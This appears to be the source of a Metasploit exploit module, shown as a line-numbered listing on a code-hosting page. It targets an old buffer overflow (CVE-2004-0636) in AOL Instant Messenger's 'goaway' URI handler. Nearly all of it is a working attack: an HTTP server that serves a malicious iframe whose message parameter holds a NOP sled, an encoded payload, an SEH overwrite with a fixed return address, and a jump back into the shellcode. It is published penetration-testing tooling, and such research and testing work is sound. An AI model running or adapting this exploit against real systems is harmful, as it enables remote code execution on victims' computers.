Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  #
10
  # This module acts as an HTTP server and exploits an SEH overwrite
11
  #
12
  include Msf::Exploit::Seh
13
  include Msf::Exploit::Remote::HttpServer::HTML
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'AOL Instant Messenger goaway Overflow',
18
      'Description'    => %q{
19
          This module exploits a flaw in the handling of AOL Instant
20
        Messenger's 'goaway' URI handler.  An attacker can execute
21
        arbitrary code by supplying an overly sized buffer as the
22
        'message' parameter.  This issue is known to affect AOL Instant
23
        Messenger 5.5.
24
      },
25
      'License'        => MSF_LICENSE,
26
      'Author'         =>
27
        [
28
          'skape',
29
          'thief <thief[at]hick.org>'
30
        ],
31
      'References'     =>
32
        [
33
          [ 'CVE', '2004-0636' ],
34
          [ 'OSVDB', '8398'    ],
35
          [ 'BID', '10889'],
36
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
37
        ],
38
      'Payload'        =>
39
        {
40
          'Space'    => 1014,
41
          'MaxNops'  => 1014,
42
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
43
          'StackAdjustment' => -3500,
44
        },
45
      'Platform'      => %w{ win },
46
      'Targets'        =>
47
        [
48
          # Target 0: Automatic
49
          [
50
            'Windows NT/2000/XP/2003 Automatic',
51
            {
52
              'Platform' => 'win',
53
              'Rets'     =>
54
                [
55
                  0x1108118f, # proto.com: pop/pop/ret
56
                ],
57
            },
58
          ],
59
        ],
60
      'DefaultTarget'  => 0,
61
      'DisclosureDate' => '2004-08-09'))
62
  end
63

64
  def on_request_uri(cli, request)
65
    # Re-generate the payload
66
    return if ((p = regenerate_payload(cli)) == nil)
67

68
    # Build out the message
69
    msg =
70
      make_nops(1014 - p.encoded.length) +     # NOP sled before the payload
71
      p.encoded +                              # store the payload
72
      generate_seh_record(target['Rets'][0]) + # set up the SEH frame
73
      "\x90\xe9\x13\xfc\xff\xff"               # jmp -1000
74

75
    # Build the HTML content
76
    content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"
77

78
    print_status("Sending #{self.name}")
79

80
    # Transmit the response to the client
81
    send_response_html(cli, content)
82

83
    # Handle the payload
84
    handler(cli)
85
  end
86
end
87

88